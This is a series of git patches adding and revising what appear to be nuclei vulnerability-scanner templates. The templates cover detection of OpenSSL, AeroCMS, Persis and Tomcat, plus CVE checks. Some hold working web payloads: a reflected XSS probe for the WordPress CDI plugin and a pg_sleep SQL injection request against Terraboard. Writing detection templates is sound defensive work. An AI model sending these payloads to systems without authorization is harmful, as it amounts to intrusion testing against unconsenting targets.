description: A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking in OpenSSL versions 3.0.0-3.0.6. This check searches for web servers with headers indicating OpenSSL versions 3.0.0-3.0.6. - metadata: - shodan-query: vuln:CVE-2022-3602 - tags: openssl,spookyssl,cve-2022-3602,cve-2022-3786 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - - type: word - part: server - words: - - "OpenSSL" - - extractors: - - type: regex - part: header - regex: - - 'OpenSSL\/(3.0.[0-6].*)' From d374cb34f78d922c13945535c66b1aba51c62a5c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 25 Nov 2022 16:31:47 +0530 Subject: [PATCH 0647/1415] Create CVE-2022-1933.yaml --- cves/2022/CVE-2022-1933.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2022/CVE-2022-1933.yaml diff --git a/cves/2022/CVE-2022-1933.yaml b/cves/2022/CVE-2022-1933.yaml new file mode 100644 index 0000000000..bcb046e65f --- /dev/null +++ b/cves/2022/CVE-2022-1933.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-1933 + +info: + name: CDI < 5.1.9 - Reflected Cross-Site-Scripting + author: Akincibor + severity: medium + description: The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting. + reference: + - https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf + tags: wp-plugin,xss,wp,wordpress,cdi + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<script>alert(document.domain)</script>' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 3b9f50d4f94469914a0ae7d0dbd782c23aff4add Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 25 Nov 2022 16:40:05 +0530 Subject: [PATCH 0648/1415] Update CVE-2022-1933.yaml --- cves/2022/CVE-2022-1933.yaml | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-1933.yaml b/cves/2022/CVE-2022-1933.yaml index bcb046e65f..5b2d26dadd 100644 --- a/cves/2022/CVE-2022-1933.yaml +++ b/cves/2022/CVE-2022-1933.yaml @@ -1,13 +1,20 @@ id: CVE-2022-1933 info: - name: CDI < 5.1.9 - Reflected Cross-Site-Scripting + name: CDI < 5.1.9 - Cross Site Scripting author: Akincibor severity: medium - description: The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting. + description: | + The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting. reference: - https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf - tags: wp-plugin,xss,wp,wordpress,cdi + - https://wordpress.org/plugins/collect-and-deliver-interface-for-woocommerce/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1933 + classification: + cve-id: CVE-2022-1933 + metadata: + verified: true + tags: cve,cve2022,wp-plugin,wp,wordpress,xss,cdi requests: - method: GET @@ -20,6 +27,8 @@ requests: part: body words: - '<script>alert(document.domain)</script>' + - 'Tracking code not correct' + condition: and - type: word part: header From 659528cfcaa542b7f3a5d44a424d699b522a91da Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 25 Nov 2022 18:14:40 +0700 Subject: [PATCH 0649/1415] Create aerocms-detect.yaml --- technologies/aerocms-detect.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 technologies/aerocms-detect.yaml diff --git a/technologies/aerocms-detect.yaml b/technologies/aerocms-detect.yaml new file mode 100644 index 0000000000..802a549670 --- /dev/null +++ b/technologies/aerocms-detect.yaml @@ -0,0 +1,26 @@ +id: aerocms-detect + +info: + name: AeroCms Detect + author: pikpikcu + severity: info + metadata: + fofa-query: "AeroCMS" + tags: tech,arocms + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>AeroCMS Private Cloud" + - ' Date: Fri, 25 Nov 2022 16:51:39 +0530 Subject: [PATCH 0650/1415] Update aerocms-detect.yaml --- technologies/aerocms-detect.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/technologies/aerocms-detect.yaml b/technologies/aerocms-detect.yaml index 802a549670..8634df5770 100644 --- a/technologies/aerocms-detect.yaml +++ b/technologies/aerocms-detect.yaml @@ -6,6 +6,7 @@ info: severity: info metadata: fofa-query: "AeroCMS" + shodan-query: title:"AeroCMS" tags: tech,arocms requests: @@ -18,8 +19,9 @@ requests: - type: word part: body words: - - "AeroCMS Private Cloud" + - "AeroCMS Private Cloud" - ' Date: Fri, 25 Nov 2022 17:03:57 +0530 Subject: [PATCH 0651/1415] Update aerocms-detect.yaml --- technologies/aerocms-detect.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/technologies/aerocms-detect.yaml b/technologies/aerocms-detect.yaml index 8634df5770..9e4bc3b143 100644 --- a/technologies/aerocms-detect.yaml +++ b/technologies/aerocms-detect.yaml @@ -1,13 +1,14 @@ id: aerocms-detect info: - name: AeroCms Detect + name: AeroCMS Detect author: pikpikcu severity: info metadata: + verified: true fofa-query: "AeroCMS" shodan-query: title:"AeroCMS" - tags: tech,arocms + tags: tech,aerocms requests: - method: GET @@ -19,9 +20,7 @@ requests: - type: word part: body words: - - "AeroCMS Private Cloud" - - ' Date: Fri, 25 Nov 2022 13:37:17 -0500 Subject: [PATCH 0655/1415] Update exposed-adb.yaml template id typo -> corrected to match filename. --- network/exposed-adb.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/exposed-adb.yaml b/network/exposed-adb.yaml index 26f932d53d..314dce5244 100644 --- a/network/exposed-adb.yaml +++ b/network/exposed-adb.yaml @@ -1,4 +1,4 @@ -id: expsoed-adb +id: exposed-adb info: name: Exposed Android Debug Bridge From e09df99376377303bb7a3d57d2bd7815ac3745bb Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Fri, 25 Nov 2022 13:39:08 -0500 Subject: [PATCH 0656/1415] Rename bash.yaml to bash-scanner.yaml matching file name with template id. --- file/bash/{bash.yaml => bash-scanner.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename file/bash/{bash.yaml => bash-scanner.yaml} (100%) diff --git a/file/bash/bash.yaml b/file/bash/bash-scanner.yaml similarity index 100% rename from file/bash/bash.yaml rename to file/bash/bash-scanner.yaml From 5958250995cf45197b1532bc4c32a6414784bbc8 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Fri, 25 Nov 2022 13:44:54 -0500 Subject: [PATCH 0657/1415] Update CVE-2021-44152.yaml - filename matching template id - added shodan query - added tags. --- cves/2021/CVE-2021-44152.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-44152.yaml b/cves/2021/CVE-2021-44152.yaml index 3195545f0d..b8e811f662 100644 --- a/cves/2021/CVE-2021-44152.yaml +++ b/cves/2021/CVE-2021-44152.yaml @@ -1,4 +1,4 @@ -id: unauth-rlm +id: CVE-2021-44152 info: name: Reprise License Manager 14.2 - Authentication Bypass @@ -14,7 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44152 cwe-id: CWE-287 - tags: unauth,rlm,packetstorm + metadata: + shodan-query: http.html:"Reprise License Manager" + tags: unauth,rlm,packetstorm,cve,cve2021 requests: - method: GET From 785599d355f59e1d183e258b4d7b452b44536240 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 26 Nov 2022 10:51:33 +0530 Subject: [PATCH 0659/1415] Update CVE-2021-44152.yaml --- cves/2021/CVE-2021-44152.yaml | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-44152.yaml b/cves/2021/CVE-2021-44152.yaml index b8e811f662..7ecd8fa703 100644 --- a/cves/2021/CVE-2021-44152.yaml +++ b/cves/2021/CVE-2021-44152.yaml @@ -4,19 +4,22 @@ info: name: Reprise License Manager 14.2 - Authentication Bypass author: Akincibor severity: critical - description: Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user. + description: | + Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-44152 - https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes - http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-44152 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-44152 cwe-id: CWE-287 metadata: + verified: true shodan-query: http.html:"Reprise License Manager" - tags: unauth,rlm,packetstorm,cve,cve2021 + google-dork: inurl:"/goforms/menu" + tags: cve,cve2021,rlm,auth-bypass requests: - method: GET @@ -25,13 +28,13 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - "RLM Administration Commands" + - type: status + status: + - 200 + # Enhanced by mp on 2022/06/03 From 9bfe64922534006ca7a4f014684a91f35e365ce7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 26 Nov 2022 08:09:27 +0000 Subject: [PATCH 0662/1415] Auto Generated CVE annotations [Sat Nov 26 08:09:27 UTC 2022] :robot: --- cves/2021/CVE-2021-44152.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-44152.yaml b/cves/2021/CVE-2021-44152.yaml index 7ecd8fa703..53cfd2061f 100644 --- a/cves/2021/CVE-2021-44152.yaml +++ b/cves/2021/CVE-2021-44152.yaml @@ -19,7 +19,7 @@ info: verified: true shodan-query: http.html:"Reprise License Manager" google-dork: inurl:"/goforms/menu" - tags: cve,cve2021,rlm,auth-bypass + tags: cve2021,rlm,auth-bypass,packetstorm,cve requests: - method: GET From 2ff518404714e480d463ab1a43d37e0aa29a950f Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 26 Nov 2022 11:52:08 +0100 Subject: [PATCH 0663/1415] Add files via upload --- exposed-panels/persis-panel.yaml | 33 ++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposed-panels/persis-panel.yaml diff --git a/exposed-panels/persis-panel.yaml b/exposed-panels/persis-panel.yaml new file mode 100644 index 0000000000..ff801ca70b --- /dev/null +++ b/exposed-panels/persis-panel.yaml @@ -0,0 +1,33 @@ +id: persis-panel + +info: + name: Persis Panel + author: righettod + severity: info + reference: + - https://www.persis.de/ + metadata: + verified: true + shodan-query: title:"Persis" + tags: panel,persis + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Persis" + - "/persis/" + condition: or + + - type: status + status: + - 200 + - 301 + - 302 + condition: or From 9a46d7aa6a8017435a2d0caacf569fa18e619a56 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 26 Nov 2022 11:58:51 +0100 Subject: [PATCH 0664/1415] Fix linter error --- exposed-panels/persis-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposed-panels/persis-panel.yaml b/exposed-panels/persis-panel.yaml index ff801ca70b..8609eb9a09 100644 --- a/exposed-panels/persis-panel.yaml +++ b/exposed-panels/persis-panel.yaml @@ -14,7 +14,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}" + - "{{BaseURL}}" matchers-condition: and matchers: @@ -23,11 +23,11 @@ requests: words: - "Persis" - "/persis/" - condition: or + condition: or - type: status status: - 200 - 301 - 302 - condition: or + condition: or From 3f46d6a1883290915be8a5c2081196796841ff81 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 26 Nov 2022 12:00:52 +0100 Subject: [PATCH 0665/1415] Fix linter error --- exposed-panels/persis-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/persis-panel.yaml b/exposed-panels/persis-panel.yaml index 8609eb9a09..e0d1d652e1 100644 --- a/exposed-panels/persis-panel.yaml +++ b/exposed-panels/persis-panel.yaml @@ -23,7 +23,7 @@ requests: words: - "Persis" - "/persis/" - condition: or + condition: or - type: status status: From 22508f670b58d1fb0de8921252e434c94a334d20 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 26 Nov 2022 15:37:12 +0000 Subject: [PATCH 0666/1415] Auto Generated New Template Addition List [Sat Nov 26 15:37:12 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cfc20b2db6..2c5a95ab47 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2022/CVE-2022-1933.yaml cves/2022/CVE-2022-25481.yaml exposed-panels/exolis-engage-panel.yaml exposed-panels/fastpanel-hosting-control-panel.yaml From 7ba039a8435520041e4e567398404a5ba53e9006 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 26 Nov 2022 21:09:18 +0530 Subject: [PATCH 0667/1415] Update CVE-2022-1883.yaml --- cves/2022/CVE-2022-1883.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-1883.yaml b/cves/2022/CVE-2022-1883.yaml index b8170334ee..18ea6d8933 100644 --- a/cves/2022/CVE-2022-1883.yaml +++ b/cves/2022/CVE-2022-1883.yaml @@ -17,7 +17,7 @@ requests: - raw: - | @timeout: 10s - GET /api/search/attribute?tf_version='+OR+pg_sleep(5)+OR+states.tf_version+LIKE+'%" HTTP/1.1 + GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1 Host: {{Hostname}} matchers-condition: and From c98c592bebbf7464da38f7502f23c2fca587a326 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 26 Nov 2022 15:41:37 +0000 Subject: [PATCH 0668/1415] Auto Generated New Template Addition List [Sat Nov 26 15:41:36 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2c5a95ab47..0b14e571c2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2022/CVE-2022-1883.yaml cves/2022/CVE-2022-1933.yaml cves/2022/CVE-2022-25481.yaml exposed-panels/exolis-engage-panel.yaml From 3911fc13f58e5acc244da59853ddc673aea26b8c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 26 Nov 2022 15:53:01 +0000 Subject: [PATCH 0669/1415] Auto Generated New Template Addition List [Sat Nov 26 15:53:01 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 0b14e571c2..4e9245a7aa 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2022/CVE-2022-1883.yaml +cves/2022/CVE-2022-1916.yaml cves/2022/CVE-2022-1933.yaml cves/2022/CVE-2022-25481.yaml exposed-panels/exolis-engage-panel.yaml From 5b077ead28c561ad618edaab19349a6d1fb1324f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 26 Nov 2022 15:56:40 +0000 Subject: [PATCH 0670/1415] Auto Generated CVE annotations [Sat Nov 26 15:56:40 UTC 2022] :robot: --- cves/2022/CVE-2022-1883.yaml | 9 +++++++-- cves/2022/CVE-2022-1933.yaml | 7 +++++-- 2 files changed, 12 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-1883.yaml b/cves/2022/CVE-2022-1883.yaml index 18ea6d8933..9a668f2432 100644 --- a/cves/2022/CVE-2022-1883.yaml +++ b/cves/2022/CVE-2022-1883.yaml @@ -3,15 +3,20 @@ id: CVE-2022-1883 info: name: Terraboard < 2.2.0 - SQL Injection author: edoardottt - severity: critical + severity: high description: | SQL Injection in GitHub repository camptocamp/terraboard prior to 2.2.0. reference: - https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1883 + - https://github.com/camptocamp/terraboard/commit/2a5dbaac015dc0714b41a59995e24f5767f89ddc + - https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 cve-id: CVE-2022-1883 - tags: cve,cve2022,terraboard,sqli + cwe-id: CWE-89 + tags: cve,cve2022,terraboard,sqli,huntr requests: - raw: diff --git a/cves/2022/CVE-2022-1933.yaml b/cves/2022/CVE-2022-1933.yaml index 5b2d26dadd..d1e2bb36b6 100644 --- a/cves/2022/CVE-2022-1933.yaml +++ b/cves/2022/CVE-2022-1933.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/collect-and-deliver-interface-for-woocommerce/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1933 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-1933 + cwe-id: CWE-79 metadata: - verified: true - tags: cve,cve2022,wp-plugin,wp,wordpress,xss,cdi + verified: "true" + tags: cdi,wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss requests: - method: GET From cd7cfb5c6342aef4567eeeec16ffe3d90c3e99c1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 26 Nov 2022 21:36:58 +0530 Subject: [PATCH 0671/1415] Update and rename vulnerabilities/backdoor/struts2-ognl-backdoor.yaml to cves/2012/CVE-2012-0394.yaml --- .../2012/CVE-2012-0394.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) rename vulnerabilities/backdoor/struts2-ognl-backdoor.yaml => cves/2012/CVE-2012-0394.yaml (63%) diff --git a/vulnerabilities/backdoor/struts2-ognl-backdoor.yaml b/cves/2012/CVE-2012-0394.yaml similarity index 63% rename from vulnerabilities/backdoor/struts2-ognl-backdoor.yaml rename to cves/2012/CVE-2012-0394.yaml index 59d14f2980..297861b3f9 100644 --- a/vulnerabilities/backdoor/struts2-ognl-backdoor.yaml +++ b/cves/2012/CVE-2012-0394.yaml @@ -1,16 +1,19 @@ -id: struts2-ognl-backdoor +id: CVE-2012-0394 info: name: Apache Struts Dev Mode OGNL Injection author: tess severity: critical + description: | + The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself." reference: - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/ - https://www.exploit-db.com/exploits/31434 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394 metadata: verified: true shodan-query: html:"Struts Problem Report" - tags: apache,struts,ognl,misconfig,injection + tags: cve,cve2012,apache,struts,ognl,injection variables: first: "{{rand_int(1000, 9999)}}" From 488a3122e862213f37e4e62121e1f3157eb1b263 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 26 Nov 2022 16:10:41 +0000 Subject: [PATCH 0673/1415] Auto Generated New Template Addition List [Sat Nov 26 16:10:41 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4e9245a7aa..ecaa5969e0 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2012/CVE-2012-0394.yaml cves/2022/CVE-2022-1883.yaml cves/2022/CVE-2022-1916.yaml cves/2022/CVE-2022-1933.yaml From 1d95f8d0250b2dba2c663fe0c493bca414a35d8b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 26 Nov 2022 21:41:31 +0530 Subject: [PATCH 0675/1415] Update public-tomcat-manager.yaml --- exposed-panels/apache/public-tomcat-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/apache/public-tomcat-manager.yaml b/exposed-panels/apache/public-tomcat-manager.yaml index 0ada62d1a9..10d61d442a 100644 --- a/exposed-panels/apache/public-tomcat-manager.yaml +++ b/exposed-panels/apache/public-tomcat-manager.yaml @@ -20,11 +20,11 @@ requests: matchers-condition: and matchers: - type: word + part: response words: - "Apache Tomcat" - "Tomcat Manager" condition: or - part: response - type: status status: From 7ae682e28236b69dec765ebdf7328afedce60caf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 26 Nov 2022 21:48:17 +0530 Subject: [PATCH 0676/1415] Update and rename network/detection/dropbear-weakalgo-detect.yaml to network/misconfig/dropbear-weakalgo.yaml --- .../dropbear-weakalgo.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename network/{detection/dropbear-weakalgo-detect.yaml => misconfig/dropbear-weakalgo.yaml} (87%) diff --git a/network/detection/dropbear-weakalgo-detect.yaml b/network/misconfig/dropbear-weakalgo.yaml similarity index 87% rename from network/detection/dropbear-weakalgo-detect.yaml rename to network/misconfig/dropbear-weakalgo.yaml index 7e9ca28537..68ea12834c 100644 --- a/network/detection/dropbear-weakalgo-detect.yaml +++ b/network/misconfig/dropbear-weakalgo.yaml @@ -1,7 +1,7 @@ -id: dropbear-weakalgo-detect +id: dropbear-weakalgo info: - name: Dropbear sshd Weak Key Exchange Algorithms Detection + name: Dropbear sshd Weak Key Exchange Algorithms Enabled author: pussycat0x severity: low description: | @@ -13,7 +13,7 @@ info: metadata: verified: true shodan-query: 'product:"Dropbear sshd"' - tags: network,ssh,dropbear + tags: network,ssh,dropbear,misconfig network: - inputs: From 0c27bbb4f40f47ad0864fee27633819901294d0b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 26 Nov 2022 21:51:18 +0530 Subject: [PATCH 0677/1415] Update and rename network/detection/dropbear-weakmac-detect.yaml to network/misconfig/dropbear-weakmac.yaml --- .../dropbear-weakmac.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename network/{detection/dropbear-weakmac-detect.yaml => misconfig/dropbear-weakmac.yaml} (86%) diff --git a/network/detection/dropbear-weakmac-detect.yaml b/network/misconfig/dropbear-weakmac.yaml similarity index 86% rename from network/detection/dropbear-weakmac-detect.yaml rename to network/misconfig/dropbear-weakmac.yaml index 28bd7353d3..143de50571 100644 --- a/network/detection/dropbear-weakmac-detect.yaml +++ b/network/misconfig/dropbear-weakmac.yaml @@ -1,7 +1,7 @@ -id: dropbear-weakmac-detect +id: dropbear-weakmac info: - name: Dropbear Weak MAC Algorithms Detection + name: Dropbear Weak MAC Algorithms Enabled author: pussycat0x severity: low description: | @@ -13,7 +13,7 @@ info: metadata: verified: true shodan-query: 'product:"Dropbear sshd"' - tags: network,ssh,dropbear + tags: network,ssh,dropbear,misconfig network: - inputs: From fa0c88eb092768b6ac7848cb27974fdd9730aba9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 26 Nov 2022 16:24:52 +0000 Subject: [PATCH 0678/1415] Auto Generated CVE annotations [Sat Nov 26 16:24:52 UTC 2022] :robot: --- cves/2022/CVE-2022-1916.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-1916.yaml b/cves/2022/CVE-2022-1916.yaml index d2d7d36855..f194e6a531 100644 --- a/cves/2022/CVE-2022-1916.yaml +++ b/cves/2022/CVE-2022-1916.yaml @@ -10,8 +10,11 @@ info: - https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808 - https://nvd.nist.gov/vuln/detail/CVE-2022-1916 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-1916 - tags: cve,cve2022,wp,wordpress,wp-plugin,xss + cwe-id: CWE-79 + tags: wordpress,wp-plugin,xss,wpscan,cve,cve2022,wp requests: - method: GET From 3e9860fac03a7d71c232c9f7e6367cafb86fa65b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 26 Nov 2022 22:05:08 +0530 Subject: [PATCH 0679/1415] Update and rename oracle-httpserver12c-files.yaml to oracle-httpserver12c.yaml --- ...erver12c-files.yaml => oracle-httpserver12c.yaml} | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) rename technologies/{oracle-httpserver12c-files.yaml => oracle-httpserver12c.yaml} (61%) diff --git a/technologies/oracle-httpserver12c-files.yaml b/technologies/oracle-httpserver12c.yaml similarity index 61% rename from technologies/oracle-httpserver12c-files.yaml rename to technologies/oracle-httpserver12c.yaml index 41e30596a3..a2f4a7eabd 100644 --- a/technologies/oracle-httpserver12c-files.yaml +++ b/technologies/oracle-httpserver12c.yaml @@ -1,25 +1,25 @@ -id: oracle-httpserver12c-files +id: oracle-httpserver12c info: - name: Oracle HTTPServer12c files + name: Oracle HTTPServer12c author: tess severity: info metadata: verified: true - tags: oracle,files + shodan-query: http.html:"Oracle HTTP Server" + tags: tech,oracle,httpserver requests: - method: GET path: - - '{{BaseURL}}/OracleHTTPServer12c_files/' + - '{{BaseURL}}' matchers-condition: and matchers: - type: word part: body words: - - "Index of /OracleHTTPServer12c_files" - condition: and + - "Oracle HTTP Server 12c" - type: word part: header From c564f054a1df29fbb0d17dce499813314c53b02c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 26 Nov 2022 16:37:13 +0000 Subject: [PATCH 0680/1415] Auto Generated New Template Addition List [Sat Nov 26 16:37:13 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ecaa5969e0..100103ae25 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ misconfiguration/postgres-exporter-metrics.yaml misconfiguration/rabbitmq-exporter-metrics.yaml misconfiguration/s3-torrent.yaml technologies/aerocms-detect.yaml +technologies/oracle-httpserver12c.yaml technologies/payara-micro-server-detect.yaml token-spray/api-giphy.yaml vulnerabilities/other/inspur-clusterengine-rce.yaml From b31da09fa155575eadc563f51582b99d634d12da Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 26 Nov 2022 22:09:19 +0530 Subject: [PATCH 0681/1415] Update symfony-fosjrouting-bundle.yaml --- misconfiguration/symfony-fosjrouting-bundle.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/misconfiguration/symfony-fosjrouting-bundle.yaml b/misconfiguration/symfony-fosjrouting-bundle.yaml index be1a5932f0..89776e7bcc 100644 --- a/misconfiguration/symfony-fosjrouting-bundle.yaml +++ b/misconfiguration/symfony-fosjrouting-bundle.yaml @@ -3,13 +3,13 @@ id: symfony-fosjrouting-bundle info: name: Symfony FOSJsRoutingBundle author: DhiyaneshDk - severity: medium + severity: low reference: - https://packagist.org/packages/friendsofsymfony/jsrouting-bundle metadata: verified: true shodan-query: http.html:"symfony Profiler" - tags: symfony + tags: misconfig,symfony requests: - method: GET From f773635f7dc7cc574588b2de13972b50b066d486 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 26 Nov 2022 16:40:19 +0000 Subject: [PATCH 0682/1415] Auto Generated New Template Addition List [Sat Nov 26 16:40:19 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 100103ae25..c03d6a9114 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2012/CVE-2012-0394.yaml +cves/2021/CVE-2021-43421.yaml cves/2022/CVE-2022-1883.yaml cves/2022/CVE-2022-1916.yaml cves/2022/CVE-2022-1933.yaml From 8b5d1c6425029d288ac3b9198095dfd6be563a4f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 26 Nov 2022 16:42:41 +0000 Subject: [PATCH 0683/1415] Auto Generated New Template Addition List [Sat Nov 26 16:42:41 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c03d6a9114..9d7e6109f6 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ misconfiguration/namedprocess-exporter-metrics.yaml misconfiguration/postgres-exporter-metrics.yaml misconfiguration/rabbitmq-exporter-metrics.yaml misconfiguration/s3-torrent.yaml +misconfiguration/symfony-fosjrouting-bundle.yaml technologies/aerocms-detect.yaml technologies/oracle-httpserver12c.yaml technologies/payara-micro-server-detect.yaml From 0f9437a964780abd691aef7e2a6c997caa256af7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 26 Nov 2022 22:15:05 +0530 Subject: [PATCH 0684/1415] Update symfony-fosjrouting-bundle.yaml --- misconfiguration/symfony-fosjrouting-bundle.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/symfony-fosjrouting-bundle.yaml b/misconfiguration/symfony-fosjrouting-bundle.yaml index 89776e7bcc..0933c7336d 100644 --- a/misconfiguration/symfony-fosjrouting-bundle.yaml +++ b/misconfiguration/symfony-fosjrouting-bundle.yaml @@ -3,7 +3,7 @@ id: symfony-fosjrouting-bundle 